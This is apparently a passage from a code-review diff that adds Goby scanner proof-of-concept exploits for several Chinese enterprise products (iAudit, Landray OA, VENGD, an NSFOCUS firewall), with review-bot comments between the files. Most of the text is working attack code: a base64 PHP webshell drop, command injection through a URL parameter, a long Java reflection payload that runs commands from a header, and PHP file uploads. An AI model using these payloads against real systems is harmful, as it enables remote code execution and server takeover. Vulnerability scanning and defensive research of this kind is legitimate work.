     36 + requestConfig.Timeout = 15
     37 + 
     38 + // 发送攻击请求
     39 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
     40 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
     41 + return true
     42 + }
     43 + }
     44 + return false
     45 + }
     46 + 
     47 + ExpManager.AddExploit(NewExploit(
     48 + goutils.GetFileName(),
     49 + expJson,
     50 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     51 + 
     52 + // 生成随机文件名
     53 + randomFileName := goutils.RandomHexString(6)
     54 + 
     55 + // 漏洞攻击包,POC 使用自删除的文件
     56 + // <?php echo md5(233);unlink(__FILE__);
     57 + if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) {
     58 + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
     59 + }
     60 + 
     61 + return false
     62 + },
     63 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     64 + 
     65 + cmd := ss.Params["cmd"].(string)
     66 + 
     67 + if exploitTopACM092348783482(cmd, expResult.HostInfo) {
     68 + expResult.Success = true
     69 + expResult.Output = "命令执行成功"
     70 + }
     71 + 
     72 + return expResult
     73 + },
     74 + ))
     75 +}
     76 + 
     77 +// https://heiwado.cn:8443/
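Review bot: `cmd := ss.Params["cmd"].(string)` in the exploit callback is an unchecked type assertion, so a missing or non-string `cmd` parameter panics the whole scan instead of returning a failed result; prefer `cmd, ok := ss.Params["cmd"].(string)` followed by `if !ok || cmd == "" { return expResult }` (the AceNet AceReporter file in this commit has the same pattern). The `Description` in the expJson record contains both of its paragraphs twice, and the record is collapsed onto one very long line while the sibling POC files use indented JSON, which is what makes the duplication easy to miss. The closing `//` comment on the file's last line is a stray host URL left from testing and should be dropped.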
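--- /dev/null
+++ b/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json
@@ -0,0 +1,161 @@
+{
+ "Name": "VENGD Arbitrary File Upload",
+ "Level": "3",
+ "Tags": [
+ "getshell"
+ ],
+ "GobyQuery": "title=\"和信下一代云桌面VENGD\"",
+ "Description": "和信创天云桌面系统存在任意文件上传",
+ "Product": "VENGD",
+ "Homepage": "https://www.vesystem.com/products/3",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://blog.csdn.net/weixin_44146996/article/details/115611026"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "FileContent",
+ "Type": "input",
+ "Value": "&lt;?php phpinfo(); ?&gt;"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/Upload/upload_file.php?l=test",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
+ },
+ "data_type": "text",
+ "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n<?php\nprint \"{{{str1}}}\";\n?>\n------WebKitFormBoundaryfcKRltGv--",
+ "set_variable": [
+ "str1|rand|str|7",
+ "r1|rand|int|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Upload/test/{{{r1}}}.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "{{{str1}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/Upload/upload_file.php?l=test",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
+ },
+ "data_type": "text",
+ "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--",
+ "set_variable": [
+ "r1|rand|int|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Upload/test/{{{r1}}}.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|define|text|/Upload/test/{{{r1}}}.php"
+ ]
+ }
+ ],
+ "PostTime": "2021-12-09 13:55:04",
+ "GobyVersion": "1.9.310"
+}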
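Review bot: The second `ExploitSteps` request verifies success with `$code == 200` only, whereas the matching `ScanSteps` request also requires the body to contain `{{{str1}}}`; a 200 from a generic handler or error page therefore marks the exploit as successful without evidence the upload landed. `Impact` and `Recommendation` are empty strings, so the finding renders with no remediation guidance; at minimum something like `"Recommendation": "Require authentication on /Upload/upload_file.php and enforce a server-side allowlist of non-executable extensions"` should be filled in. The `ExpParams` entry uses capitalised keys (`Name`/`Type`/`Value`) while the other POCs in this commit use `name`/`type`/`value`, which looks like it may not be read by the engine at all — worth confirming. The detection step itself writes `{{{r1}}}.php` to the target and never removes it, and `ExpTips` does not disclose that side effect.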
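--- /dev/null
+++ b/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt
@@ -0,0 +1,104 @@
+package exploits
+
+import (
+ "fmt"
+ "git.gobies.org/goby/goscanner/goutils"
+ "git.gobies.org/goby/goscanner/jsonvul"
+ "git.gobies.org/goby/goscanner/scanconfig"
+ "git.gobies.org/goby/httpclient"
+ "strings"
+)
+
+func init() {
+ expJson := `{
+ "Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE",
+ "Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability",
+ "Product": "ZhongYuan iAudit",
+ "Homepage": "https://www.tosec.com.cn/",
+ "DisclosureDate": "2021-06-01",
+ "Author": "PeiQi",
+ "GobyQuery": "body=\"admin.php?controller=admin_index&amp;action=chklogin&amp;ref\"",
+ "Level": "3",
+ "Impact": "<p>The existence of command splicing leads to remote command execution vulnerability<br></p>",
+ "Recommendation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "id"
+ }
+ ],
+ "ScanSteps": [
+ "AND"
+ ],
+ "ExploitSteps": null,
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": [
+ "WangKang Next generation firewall"
+ ],
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ },
+ "Recommandation": "<p>Upgrade version<br></p>"
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
+ return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid")
+ }
+ }
+ }
+ return false
+ },
+ func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ cmd := ss.Params["Cmd"].(string)
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
+ expResult.Output = resp.Utf8Html
+ expResult.Success = true
+ }
+ }
+ }
+ return expResult
+ },
+ ))
+}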
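Review bot: `cmd := ss.Params["Cmd"].(string)` on line 82 is an unchecked type assertion; a missing or non-string parameter panics inside the callback and takes the scanner worker down with it, so use the two-value form, `cmd, ok := ss.Params["Cmd"].(string)` followed by `if !ok { return expResult }`. The `fmt` import on line 4 is never used, which `go vet` and the compiler both reject the moment this file stops being a `.txt`. The metadata also contradicts itself: `AttackSurfaces.Application` names "WangKang Next generation firewall" although the POC is for ZhongYuan iAudit, and `Recommendation` is empty while the misspelled `Recommandation` key carries the remediation text, so the intended key shows nothing. Local names such as `uri_1`/`cfg_1` should be MixedCaps (`uri1`, `cfg1`) to match Go convention and the nsfocus POC in this same commit.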
    lib/goby/goby_pocs/landray_oa_treexml_rce.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "git.gobies.org/goby/goscanner/goutils"
     5 +)
     6 + 
     7 +func init() {
     8 + expJson := `{
     9 + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
     10 + "Description": "<p><span style=\"color: rgba(0, 0, 0, 0.8); font-size: 16px;\">蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限</span><br></p>",
     11 + "Product": "蓝凌OA",
     12 + "Homepage": "www.landray.com.cn",
     13 + "DisclosureDate": "2022-07-18",
     14 + "Author": "",
     15 + "FofaQuery": "app=\"Landray-OA系统\"",
     16 + "GobyQuery": "app=\"Landray-OA系统\"",
     17 + "Level": "3",
     18 + "Impact": "",
     19 + "Recommendation": "",
     20 + "References": [
     21 + "http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html"
     22 + ],
     23 + "Is0day": false,
     24 + "HasExp": true,
     25 + "ExpParams": [
     26 + {
     27 + "name": "command",
     28 + "type": "input",
     29 + "value": "whoami",
     30 + "show": ""
     31 + }
     32 + ],
     33 + "ExpTips": {
     34 + "Type": "",
     35 + "Content": ""
     36 + },
     37 + "ScanSteps": [
     38 + "AND",
     39 + {
     40 + "Request": {
     41 + "method": "POST",
     42 + "uri": "/data/sys-common/treexml.tmpl",
     43 + "follow_redirect": true,
     44 + "header": {
     45 + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
     46 + "Accept-Encoding": "gzip, deflate",
     47 + "cmd": "echo This page has a bug",
     48 + "Accept": "*/*",
     49 + "Content-Type": "application/x-www-form-urlencoded"
     50 + },
     51 + "data_type": "text",
     52 + "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\
")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
     53 + },
     54 + "ResponseTest": {
     55 + "type": "group",
     56 + "operation": "AND",
     57 + "checks": [
     58 + {
     59 + "type": "item",
     60 + "variable": "$code",
     61 + "operation": "==",
     62 + "value": "200",
     63 + "bz": ""
     64 + },
     65 + {
     66 + "type": "item",
     67 + "variable": "$body",
     68 + "operation": "contains",
     69 + "value": "This page has a bug",
     70 + "bz": ""
     71 + }
     72 + ]
     73 + },
     74 + "SetVariable": []
     75 + }
     76 + ],
     77 + "ExploitSteps": [
     78 + "AND",
     79 + {
     80 + "Request": {
     81 + "method": "POST",
     82 + "uri": "/data/sys-common/treexml.tmpl",
     83 + "follow_redirect": true,
     84 + "header": {
     85 + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
     86 + "Accept-Encoding": "gzip, deflate",
     87 + "cmd": "{{{command}}}",
     88 + "Accept": "*/*",
     89 + "Content-Type": "application/x-www-form-urlencoded"
     90 + },
     91 + "data_type": "text",
     92 + "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\
")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
     93 + },
     94 + "ResponseTest": {
     95 + "type": "group",
     96 + "operation": "AND",
     97 + "checks": [
     98 + {
     99 + "type": "item",
     100 + "variable": "$code",
     101 + "operation": "==",
     102 + "value": "200",
     103 + "bz": ""
     104 + }
     105 + ]
     106 + },
     107 + "SetVariable": [
     108 + "output|lastbody||"
     109 + ]
     110 + }
     111 + ],
     112 + "Tags": [
     113 + "代码执⾏"
     114 + ],
     115 + "VulType": [
     116 + "代码执⾏"
     117 + ],
     118 + "CVEIDs": [
     119 + ""
     120 + ],
     121 + "CNNVD": [
     122 + ""
     123 + ],
     124 + "CNVD": [
     125 + ""
     126 + ],
     127 + "CVSSScore": "",
     128 + "Translation": {
     129 + "CN": {
     130 + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
     131 + "Product": "蓝凌OA",
     132 + "Description": "<p><span style=\"color: rgba(0, 0, 0, 0.8); font-size: 16px;\">蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限</span><br></p>",
     133 + "Recommendation": "",
     134 + "Impact": "",
     135 + "VulType": [
     136 + "代码执⾏"
     137 + ],
     138 + "Tags": [
     139 + "代码执⾏"
     140 + ]
     141 + },
     142 + "EN": {
     143 + "Name": "landray-oa-treexml-rce",
     144 + "Product": "",
     145 + "Description": "",
     146 + "Recommendation": "",
     147 + "Impact": "",
     148 + "VulType": [],
     149 + "Tags": []
     150 + }
     151 + },
     152 + "AttackSurfaces": {
     153 + "Application": null,
     154 + "Support": null,
     155 + "Service": null,
     156 + "System": null,
     157 + "Hardware": null
     158 + }
     159 +}`
     160 + 
     161 + ExpManager.AddExploit(NewExploit(
     162 + goutils.GetFileName(),
     163 + expJson,
     164 + nil,
     165 + nil,
     166 + ))
     167 +}
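Review bot: The POC metadata is mostly empty — `Author`, `Impact` and `Recommendation` are empty strings, `CVEIDs`, `CNNVD` and `CNVD` each hold a single empty string rather than an empty array, and the `EN` translation carries only the slug `landray-oa-treexml-rce` as its `Name` — so the finding renders without any remediation guidance. The `Tags`/`VulType` value `代码执⾏` appears to end in the Kangxi-radical codepoint rather than the CJK ideograph `行`, so any filter on the tag `代码执行` will miss this entry; the same string appears in the nsfocus POC later in this commit. The detection step relies on a command actually running on the target (the `cmd: echo This page has a bug` header) rather than a passive fingerprint, which should at least be disclosed in `ExpTips` so operators know a scan executes code on the host.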
    lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt
     1 +package exploits
     2 + 
     3 +import (
     4 + "fmt"
     5 + "git.gobies.org/goby/goscanner/goutils"
     6 + "git.gobies.org/goby/goscanner/jsonvul"
     7 + "git.gobies.org/goby/goscanner/scanconfig"
     8 + "git.gobies.org/goby/httpclient"
     9 + "net/url"
     10 + "strings"
     11 + "time"
     12 +)
     13 + 
     14 +func init() {
     15 + expJson := `{
     16 + "Name": "nsfocus resourse.php arbitrary file upload vulnerability",
     17 + "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
     18 + "Product": "nsfocus",
     19 + "Homepage": "https://www.nsfocus.com.cn/",
     20 + "DisclosureDate": "2022-07-18",
     21 + "Author": "LittleBlack",
     22 + "FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
     23 + "GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
     24 + "Level": "3",
     25 + "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
     26 + "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
     27 + "References": [
     28 + "https://fofa.so/"
     29 + ],
     30 + "Is0day": false,
     31 + "HasExp": true,
     32 + "ExpParams": [
     33 + {
     34 + "name": "cmd",
     35 + "type": "input",
     36 + "value": "system('id');",
     37 + "show": ""
     38 + }
     39 + ],
     40 + "ExpTips": {
     41 + "Type": "",
     42 + "Content": ""
     43 + },
     44 + "ScanSteps": [
     45 + "AND",
     46 + {
     47 + "Request": {
     48 + "method": "GET",
     49 + "uri": "/test.php",
     50 + "follow_redirect": true,
     51 + "header": {},
     52 + "data_type": "text",
     53 + "data": ""
     54 + },
     55 + "ResponseTest": {
     56 + "type": "group",
     57 + "operation": "AND",
     58 + "checks": [
     59 + {
     60 + "type": "item",
     61 + "variable": "$code",
     62 + "operation": "==",
     63 + "value": "200",
     64 + "bz": ""
     65 + },
     66 + {
     67 + "type": "item",
     68 + "variable": "$body",
     69 + "operation": "contains",
     70 + "value": "test",
     71 + "bz": ""
     72 + }
     73 + ]
     74 + },
     75 + "SetVariable": []
     76 + }
     77 + ],
     78 + "ExploitSteps": [
     79 + "AND",
     80 + {
     81 + "Request": {
     82 + "method": "GET",
     83 + "uri": "/test.php",
     84 + "follow_redirect": true,
     85 + "header": {},
     86 + "data_type": "text",
     87 + "data": ""
     88 + },
     89 + "ResponseTest": {
     90 + "type": "group",
     91 + "operation": "AND",
     92 + "checks": [
     93 + {
     94 + "type": "item",
     95 + "variable": "$code",
     96 + "operation": "==",
     97 + "value": "200",
     98 + "bz": ""
     99 + },
     100 + {
     101 + "type": "item",
     102 + "variable": "$body",
     103 + "operation": "contains",
     104 + "value": "test",
     105 + "bz": ""
     106 + }
     107 + ]
     108 + },
     109 + "SetVariable": []
     110 + }
     111 + ],
     112 + "VulType": [
     113 + "Code Execution"
     114 + ],
     115 + "Tags": [
     116 + "Code Execution"
     117 + ],
     118 + "CVEIDs": [
     119 + ""
     120 + ],
     121 + "CNNVD": [
     122 + ""
     123 + ],
     124 + "CNVD": [
     125 + ""
     126 + ],
     127 + "CVSSScore": "9.5",
     128 + "Translation": {
     129 + "CN": {
     130 + "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
     131 + "Product": "绿盟下一代防火墙",
     132 + "Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
     133 + "Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
     134 + "Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
     135 + "VulType": [
     136 + "代码执⾏"
     137 + ],
     138 + "Tags": [
     139 + "代码执⾏"
     140 + ]
     141 + },
     142 + "EN": {
     143 + "Name": "nsfocus resourse.php 任意文件上传漏洞",
     144 + "Product": "nsfocus",
     145 + "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
     146 + "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
     147 + "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
     148 + "VulType": [
     149 + "Code Execution"
     150 + ],
     151 + "Tags": [
     152 + "Code Execution"
     153 + ]
     154 + }
     155 + },
     156 + "AttackSurfaces": {
     157 + "Application": null,
     158 + "Support": null,
     159 + "Service": null,
     160 + "System": null,
     161 + "Hardware": null
     162 + }
     163 +}`
     164 + 
     165 + ExpManager.AddExploit(NewExploit(
     166 + goutils.GetFileName(),
     167 + expJson,
     168 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
     169 + 
     170 + u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
     171 + uri1 := "/api/v1/device/bugsInfo"
